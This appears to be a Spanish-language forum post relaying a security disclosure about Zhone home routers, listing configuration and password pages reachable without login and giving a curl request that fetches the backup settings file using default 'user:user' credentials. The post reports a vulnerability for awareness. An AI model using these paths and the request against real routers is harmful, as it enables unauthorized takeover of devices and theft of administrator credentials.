El libre pensamiento para un internet libre
No estas registrado.
No conocía a la marca Zhone.
Tienen una pequeña serie de CPE : products
Estos routers sufren de una grave enfermedad: además de tener una pinta que espanta hasta sus propias madres; son iguales de seguros que un router thomson ( cf Obtener los credenciales de administrador de un Thomson TWG850)
Es lo que demuestra hoy Mahmoud Khaled en vunerabiltylab.
La información fue también puesta en packet storm:
Puedes acceder a estas tres paginas mediante http sin conocer los credenciales
http://[LOCALHOST]:?/pvccfg.cgi
http://[LOCALHOST]:?/dnscfg.cgi
http://[LOCALHOST]:?/password.cgi (In addition to text storage of sensitive information!)
En localhost pones la pasarela y si vas por ejemplo a password.cgi puedes conocer or re-configurar el nombre y la contraseña de administrador.
Puedes obtener los parámetros guardados en el fichero backupsettings.conf. gracias una simple petición con curl.
curl "http://<IP>/backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy"
( ("dXNlcjp1c2Vy" = "user:user" en base64))
Un tipo de brecha ya vistas en le pasado y que no deberíamos encontrar en una serie moderna de puntos de acceso.
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
Ayuda con bam 3g Digitel instalación por diselmcluis.14
|
1 | 53 | Ayer 14:34:01 por kcdtv |
Duda con "Probes" de airodump-ng por Vantroll
|
3 | 127 | 25-02-2021 16:26:03 por kcdtv |
0 | 113 | 24-02-2021 16:57:37 por kcdtv | |
2 | 380 | 22-02-2021 22:35:09 por kcdtv | |
0 | 90 | 22-02-2021 22:33:06 por kcdtv |
Ultimo usuario registrado: aleadrinoa
Usuarios registrados conectados: 0
Invitados conectados: 8
Número total de usuarios registrados: 2,127
Número total de temas: 1,505
Número total de mensajes: 14,653
Atom tema feed - Impulsado por FluxBB